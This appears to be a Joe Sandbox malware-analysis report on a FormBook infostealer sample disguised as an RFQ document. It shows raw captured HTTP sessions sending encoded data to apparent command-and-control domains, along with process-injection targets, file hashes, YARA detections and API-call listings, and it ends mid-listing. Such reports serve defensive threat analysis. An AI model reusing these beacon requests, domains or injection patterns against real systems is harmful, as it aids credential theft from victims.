Dec 9, 2024 08:33:35.062782049 CET	535	OUT	GET /4nyz/?6Pvh8TXP=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&9dfhu=10RxttPPB0 HTTP/1.1 Host: www.snyp.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Dec 9, 2024 08:33:36.030951023 CET	402	IN	HTTP/1.1 200 OK content-type: text/html date: Mon, 09 Dec 2024 07:33:35 GMT content-length: 281 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 50 76 68 38 54 58 50 3d 62 63 4d 2f 4a 51 2f 45 46 77 46 57 59 51 67 74 54 4f 4f 53 33 35 72 71 6f 46 4d 64 76 69 65 67 54 4a 4b 6d 78 49 70 4a 6f 66 68 46 6b 79 4a 4d 52 70 54 55 47 74 43 39 31 5a 55 50 5a 52 4d 62 55 62 4e 4b 58 42 65 48 41 70 4e 73 41 58 4a 2b 4f 48 74 4c 66 41 56 67 6e 65 33 66 44 50 4e 5a 79 41 38 6a 66 57 71 32 64 61 37 55 54 34 35 71 30 66 77 31 62 38 53 58 38 48 31 65 2f 4c 6e 72 63 52 46 6c 58 39 6f 6d 32 68 52 6f 26 39 64 66 68 75 3d 31 30 52 78 74 74 50 50 42 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6Pvh8TXP=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&9dfhu=10RxttPPB0"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49852	156.251.17.224	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:33:41.707206964 CET	797	OUT	POST /u11p/ HTTP/1.1 Host: www.duwixushx.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Origin: http://www.duwixushx.xyz Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 221 Referer: http://www.duwixushx.xyz/u11p/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36 Data Raw: 36 50 76 68 38 54 58 50 3d 70 62 4a 4e 55 50 41 38 69 57 53 6a 70 37 65 34 49 46 71 45 58 75 6f 38 74 37 78 31 34 42 56 69 54 62 50 56 34 38 6c 64 54 77 49 35 6f 49 4d 4f 70 62 78 54 50 77 77 47 51 4e 51 77 6e 45 30 46 68 64 4e 4f 66 41 6f 48 78 34 42 48 44 39 77 67 6c 6f 37 6d 61 35 70 64 30 6a 39 61 4a 55 46 42 6e 72 41 45 36 59 58 78 48 48 4e 54 35 32 54 76 32 41 41 74 6c 73 56 6e 39 5a 4f 74 38 77 58 5a 37 69 72 76 35 30 6c 64 31 67 70 4e 66 70 34 52 42 2b 71 36 2b 53 54 54 55 73 34 54 34 73 39 59 51 47 78 61 47 49 63 54 59 5a 56 79 34 71 53 55 4b 64 58 2b 53 71 52 61 4d 32 67 38 74 72 6f 62 72 62 63 4a 75 50 52 46 58 6a 66 55 52 64 75 4a 44 51 3d 3d Data Ascii: 6Pvh8TXP=pbJNUPA8iWSjp7e4IFqEXuo8t7x14BViTbPV48ldTwI5oIMOpbxTPwwGQNQwnE0FhdNOfAoHx4BHD9wglo7ma5pd0j9aJUFBnrAE6YXxHHNT52Tv2AAtlsVn9ZOt8wXZ7irv50ld1gpNfp4RB+q6+STTUs4T4s9YQGxaGIcTYZVy4qSUKdX+SqRaM2g8trobrbcJuPRFXjfURduJDQ==
Dec 9, 2024 08:33:43.193639994 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 09 Dec 2024 07:33:42 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49857	18.141.10.107	80

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:33:42.533005953 CET	358	OUT	POST /gepvpveyhkiwwmj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Dec 9, 2024 08:33:42.533005953 CET	874	OUT	Data Raw: 7e 07 39 31 d4 b8 57 8a 5e 03 00 00 fd b6 cf 3d 5e be 91 b8 cf 0f a7 69 1e 35 e7 1c 18 d5 dc ee 5e c7 0d fe 21 31 e9 2d 34 63 52 08 61 50 6b 49 96 c4 de fa 69 f3 1e f2 5d 28 e3 14 43 b3 fc b3 98 d9 79 d8 f6 14 ce 91 83 10 b9 04 ae 46 3e 5b d4 b7 Data Ascii: ~91W^=^i5^!1-4cRaPkIi](CyF>[;S>P2x}BsOmiia,=!RM w`WoM*8/~-GWJea$?^&:Ha87\hE8
Dec 9, 2024 08:33:44.568409920 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Dec 2024 07:33:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b6309c1ca69961f7e893b2e04967c17a\|8.46.123.228\|1733729624\|1733729624\|0\|1\|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.7	49865	156.251.17.224	80

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:33:45.782782078 CET	817	OUT	POST /u11p/ HTTP/1.1 Host: www.duwixushx.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Origin: http://www.duwixushx.xyz Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 241 Referer: http://www.duwixushx.xyz/u11p/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36 Data Raw: 36 50 76 68 38 54 58 50 3d 70 62 4a 4e 55 50 41 38 69 57 53 6a 70 61 75 34 4f 6d 43 45 56 4f 6f 37 6a 62 78 31 79 68 56 6d 54 61 7a 56 34 39 52 30 54 69 38 35 6f 74 77 4f 6e 35 56 54 43 51 77 47 59 74 51 78 6f 6b 31 4a 68 64 49 78 66 46 6f 48 78 34 46 48 44 35 30 67 69 5a 37 6c 63 35 70 54 76 54 39 59 4e 55 46 42 6e 72 41 45 36 63 2b 35 48 48 56 54 35 48 6a 76 33 6a 5a 66 6b 73 56 6b 36 5a 4f 74 34 77 58 46 37 69 72 64 35 77 46 37 31 6d 74 4e 66 74 6f 52 43 76 71 37 77 53 54 56 4c 38 35 4e 77 65 4d 57 4b 32 5a 6a 48 71 55 62 62 4a 35 4d 39 63 54 32 51 2f 62 53 4d 37 70 68 49 30 45 4b 36 4e 31 75 70 61 59 52 6a 74 6c 6b 49 55 36 2b 63 50 50 4e 56 6e 45 77 41 77 70 36 49 47 66 47 4c 47 6b 65 68 66 41 2b 4b 76 41 3d Data Ascii: 6Pvh8TXP=pbJNUPA8iWSjpau4OmCEVOo7jbx1yhVmTazV49R0Ti85otwOn5VTCQwGYtQxok1JhdIxfFoHx4FHD50giZ7lc5pTvT9YNUFBnrAE6c+5HHVT5Hjv3jZfksVk6ZOt4wXF7ird5wF71mtNftoRCvq7wSTVL85NweMWK2ZjHqUbbJ5M9cT2Q/bSM7phI0EK6N1upaYRjtlkIU6+cPPNVnEwAwp6IGfGLGkehfA+KvA=
Dec 9, 2024 08:33:47.284848928 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 09 Dec 2024 07:33:47 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 9, 2024 08:33:47.907763004 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 09 Dec 2024 07:33:47 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Target ID:	0
Start time:	02:31:36
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe"
Imagebase:	0x400000
File size:	1'801'728 bytes
MD5 hash:	DD6599C8B0D09A38D88EF2C1E1720A6C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:31:37
Start date:	09/12/2024
Path:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase:	0x400000
File size:	1'658'880 bytes
MD5 hash:	785A052E614E12F8A62CD368B4273290
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	02:31:37
Start date:	09/12/2024
Path:	C:\Windows\System32\alg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\alg.exe
Imagebase:	0x140000000
File size:	1'594'368 bytes
MD5 hash:	5DBFDD947810E81DAFCE72FA7C481167
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	02:31:39
Start date:	09/12/2024
Path:	C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	138'056 bytes
MD5 hash:	BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	02:31:39
Start date:	09/12/2024
Path:	C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	174'408 bytes
MD5 hash:	E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	02:31:39
Start date:	09/12/2024
Path:	C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	154'952 bytes
MD5 hash:	2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	02:31:39
Start date:	09/12/2024
Path:	C:\Windows\System32\AppVClient.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\AppVClient.exe
Imagebase:	0x140000000
File size:	1'348'608 bytes
MD5 hash:	1D7D22CFCA51F1A73A539A64CC53B616
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:31:40
Start date:	09/12/2024
Path:	C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\fxssvc.exe
Imagebase:	0x140000000
File size:	1'242'624 bytes
MD5 hash:	2F8DCF43C75A2511D20EB9E59E43AB07
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:31:40
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe"
Imagebase:	0x860000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1948226001.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1950189449.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1952345279.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:31:42
Start date:	09/12/2024
Path:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase:	0x140000000
File size:	1'725'440 bytes
MD5 hash:	A46C8436F8D489B69D8BDDEB6C9361EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:32:14
Start date:	09/12/2024
Path:	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe"
Imagebase:	0x210000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2750881056.0000000003910000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	02:32:16
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\choice.exe"
Imagebase:	0xd0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2750875662.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2742686769.0000000002310000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2751208214.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	02:32:30
Start date:	09/12/2024
Path:	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe"
Imagebase:	0x210000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2753929696.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	02:32:45
Start date:	09/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x140000000
File size:	1'246'208 bytes
MD5 hash:	30AE870CC81481FC14F2B11D911AB42F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	8.1%
Signature Coverage:	7.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	77

Executed Functions

Function 00B9CBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

d, xrefs: 00B9C294
w, xrefs: 00B9C289

Memory Dump Source

Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID: d$w
API String ID: 0-2400632791
Opcode ID: 8b4687f9f1373dd07e815718e9bc9babd62ff994d8e095e0c3d8804ad2cc4433
Instruction ID: 006a62e42fbee10fdf3c16105e080b9ef04ab205eab6a3a63a8a1c6ad40bb1e9
Opcode Fuzzy Hash: 8b4687f9f1373dd07e815718e9bc9babd62ff994d8e095e0c3d8804ad2cc4433
Instruction Fuzzy Hash: 87C17321A0C380ABDE355B289C5AF763FE4EB627A0F8D05F6F549960F3D7249C04D622

Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
IsDebuggerPresent.KERNEL32 ref: 00403B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346

Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16

Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41

Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415

Strings

This is a third-party compiled AutoIt script., xrefs: 0043D279
runas, xrefs: 0043D33A
%I, xrefs: 00403C44

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%I
API String ID: 529118366-2806069697
Opcode ID: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
Opcode Fuzzy Hash: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 004049CD

